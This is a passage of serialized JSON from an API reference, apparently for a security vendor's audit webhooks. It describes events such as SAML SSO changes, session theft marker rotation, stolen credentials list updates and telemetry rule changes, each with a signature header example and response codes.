added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A SAML SSO connection has been added."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/saml-sso-added-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_707"}},"schemaId":"schema_707","pointer":"/paths/saml-sso-added-event/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"saml-sso-added-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_707"}},"responseCodes":["2XX"],"pointer":"saml-sso-added-event","href":"audit/saml-sso-added-event","openApiOperationId":"saml-sso-added-event","summary":"SAML SSO added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_707","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_707"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/saml-sso-added-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/saml-sso-added-event"}],"panels":[]}]},"httpPath":"saml-sso-added-event"},{"label":"SAML SSO completed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/saml-sso-completed-event","routeSlug":"/webhooks-v1/audit/saml-sso-completed-event","metadata":{"seo":{"title":"SAML SSO completed","description":"A SAML SSO connection has been successfully setup and enabled."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"saml-sso-completed-event","name":"SAML SSO completed","isWebhook":true,"pointer":"/paths/saml-sso-completed-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SAML SSO completed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A SAML SSO connection has been successfully setup and enabled."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/saml-sso-completed-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_708"}},"schemaId":"schema_708","pointer":"/paths/saml-sso-completed-event/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"saml-sso-completed-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_708"}},"responseCodes":["2XX"],"pointer":"saml-sso-completed-event","href":"audit/saml-sso-completed-event","openApiOperationId":"saml-sso-completed-event","summary":"SAML SSO completed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_708","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_708"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/saml-sso-completed-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/saml-sso-completed-event"}],"panels":[]}]},"httpPath":"saml-sso-completed-event"},{"label":"SAML SSO default role updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/saml-sso-default-role-updated-event","routeSlug":"/webhooks-v1/audit/saml-sso-default-role-updated-event","metadata":{"seo":{"title":"SAML SSO default role updated","description":"An admin updated the SAML SSO default role."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"saml-sso-default-role-updated-event","name":"SAML SSO default role updated","isWebhook":true,"pointer":"/paths/saml-sso-default-role-updated-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SAML SSO default role updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin updated the SAML SSO default role."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/saml-sso-default-role-updated-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_709"}},"schemaId":"schema_709","pointer":"/paths/saml-sso-default-role-updated-event/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"saml-sso-default-role-updated-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_709"}},"responseCodes":["2XX"],"pointer":"saml-sso-default-role-updated-event","href":"audit/saml-sso-default-role-updated-event","openApiOperationId":"saml-sso-default-role-updated-event","summary":"SAML SSO default role updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_709","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_709"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/saml-sso-default-role-updated-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/saml-sso-default-role-updated-event"}],"panels":[]}]},"httpPath":"saml-sso-default-role-updated-event"},{"label":"Session theft domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/session-theft-domains-added-event","routeSlug":"/webhooks-v1/audit/session-theft-domains-added-event","metadata":{"seo":{"title":"Session theft domains added","description":"A set of domains have been added to the list of domains in which the session theft marker is injected."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"session-theft-domains-added-event","name":"Session theft domains added","isWebhook":true,"pointer":"/paths/session-theft-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Session theft domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of domains in which the session theft marker is injected."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/session-theft-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_710"}},"schemaId":"schema_710","pointer":"/paths/session-theft-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"session-theft-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_710"}},"responseCodes":["2XX"],"pointer":"session-theft-domains-added","href":"audit/session-theft-domains-added-event","openApiOperationId":"session-theft-domains-added-event","summary":"Session theft domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_710","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_710"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/session-theft-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/session-theft-domains-added-event"}],"panels":[]}]},"httpPath":"session-theft-domains-added"},{"label":"Session theft domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/session-theft-domains-removed-event","routeSlug":"/webhooks-v1/audit/session-theft-domains-removed-event","metadata":{"seo":{"title":"Session theft domains removed","description":"A set of domains have been removed from the list of domains in which the session theft marker is injected."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"session-theft-domains-removed-event","name":"Session theft domains removed","isWebhook":true,"pointer":"/paths/session-theft-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Session theft domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of domains in which the session theft marker is injected."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/session-theft-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_711"}},"schemaId":"schema_711","pointer":"/paths/session-theft-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"session-theft-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_711"}},"responseCodes":["2XX"],"pointer":"session-theft-domains-removed","href":"audit/session-theft-domains-removed-event","openApiOperationId":"session-theft-domains-removed-event","summary":"Session theft domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_711","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_711"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/session-theft-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/session-theft-domains-removed-event"}],"panels":[]}]},"httpPath":"session-theft-domains-removed"},{"label":"Session theft marker rotated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/session-theft-marker-rotated-event","routeSlug":"/webhooks-v1/audit/session-theft-marker-rotated-event","metadata":{"seo":{"title":"Session theft marker rotated","description":"An admin user has rotated the session theft marker."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"session-theft-marker-rotated-event","name":"Session theft marker rotated","isWebhook":true,"pointer":"/paths/session-theft-marker-rotated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Session theft marker rotated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has rotated the session theft marker."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/session-theft-marker-rotated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_712"}},"schemaId":"schema_712","pointer":"/paths/session-theft-marker-rotated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"session-theft-marker-rotated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_712"}},"responseCodes":["2XX"],"pointer":"session-theft-marker-rotated","href":"audit/session-theft-marker-rotated-event","openApiOperationId":"session-theft-marker-rotated-event","summary":"Session theft marker rotated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_712","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_712"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/session-theft-marker-rotated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/session-theft-marker-rotated-event"}],"panels":[]}]},"httpPath":"session-theft-marker-rotated"},{"label":"Stolen credentials added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/stolen-credentials-added-event","routeSlug":"/webhooks-v1/audit/stolen-credentials-added-event","metadata":{"seo":{"title":"Stolen credentials added","description":"A set of stolen credentials have been added."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"stolen-credentials-added-event","name":"Stolen credentials added","isWebhook":true,"pointer":"/paths/stolen-credentials-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Stolen credentials added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of stolen credentials have been added."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/stolen-credentials-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_713"}},"schemaId":"schema_713","pointer":"/paths/stolen-credentials-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"stolen-credentials-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_713"}},"responseCodes":["2XX"],"pointer":"stolen-credentials-added","href":"audit/stolen-credentials-added-event","openApiOperationId":"stolen-credentials-added-event","summary":"Stolen credentials added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_713","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_713"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/stolen-credentials-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/stolen-credentials-added-event"}],"panels":[]}]},"httpPath":"stolen-credentials-added"},{"label":"Stolen credentials removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/stolen-credentials-removed-event","routeSlug":"/webhooks-v1/audit/stolen-credentials-removed-event","metadata":{"seo":{"title":"Stolen credentials removed","description":"A set of stolen credentials have been removed."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"stolen-credentials-removed-event","name":"Stolen credentials removed","isWebhook":true,"pointer":"/paths/stolen-credentials-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Stolen credentials removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of stolen credentials have been removed."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/stolen-credentials-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_714"}},"schemaId":"schema_714","pointer":"/paths/stolen-credentials-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"stolen-credentials-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_714"}},"responseCodes":["2XX"],"pointer":"stolen-credentials-removed","href":"audit/stolen-credentials-removed-event","openApiOperationId":"stolen-credentials-removed-event","summary":"Stolen credentials removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_714","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_714"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/stolen-credentials-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/stolen-credentials-removed-event"}],"panels":[]}]},"httpPath":"stolen-credentials-removed"},{"label":"Stolen credentials mode updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/stolen-credentials-mode-updated-event","routeSlug":"/webhooks-v1/audit/stolen-credentials-mode-updated-event","metadata":{"seo":{"title":"Stolen credentials mode updated","description":"An admin user has updated the mode of the stolen credentials feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"stolen-credentials-mode-updated-event","name":"Stolen credentials mode updated","isWebhook":true,"pointer":"/paths/stolen-credentials-mode-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Stolen credentials mode updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the mode of the stolen credentials feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/stolen-credentials-mode-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_715"}},"schemaId":"schema_715","pointer":"/paths/stolen-credentials-mode-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"stolen-credentials-mode-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_715"}},"responseCodes":["2XX"],"pointer":"stolen-credentials-mode-updated","href":"audit/stolen-credentials-mode-updated-event","openApiOperationId":"stolen-credentials-mode-updated-event","summary":"Stolen credentials mode updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_715","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_715"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/stolen-credentials-mode-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/stolen-credentials-mode-updated-event"}],"panels":[]}]},"httpPath":"stolen-credentials-mode-updated"},{"label":"Telemetry rule added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/telemetry-rule-added-event","routeSlug":"/webhooks-v1/audit/telemetry-rule-added-event","metadata":{"seo":{"title":"Telemetry rule added","description":"An admin user has added a new telemetry rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"telemetry-rule-added-event","name":"Telemetry rule added","isWebhook":true,"pointer":"/paths/telemetry-rule-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Telemetry rule added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has added a new telemetry rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/telemetry-rule-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_716"}},"schemaId":"schema_716","pointer":"/paths/telemetry-rule-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"telemetry-rule-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_716"}},"responseCodes":["2XX"],"pointer":"telemetry-rule-added","href":"audit/telemetry-rule-added-event","openApiOperationId":"telemetry-rule-added-event","summary":"Telemetry rule added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_716","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_716"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/telemetry-rule-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/telemetry-rule-added-event"}],"panels":[]}]},"httpPath":"telemetry-rule-added"},{"label":"Telemetry rule updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/telemetry-rule-updated-event","routeSlug":"/webhooks-v1/audit/telemetry-rule-updated-event","metadata":{"seo":{"title":"Telemetry rule updated","description":"An admin user has updated a telemetry rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"telemetry-rule-updated-event","name":"Telemetry rule updated","isWebhook":true,"pointer":"/paths/telemetry-rule-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Telemetry rule updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated a telemetry rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/telemetry-rule-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request 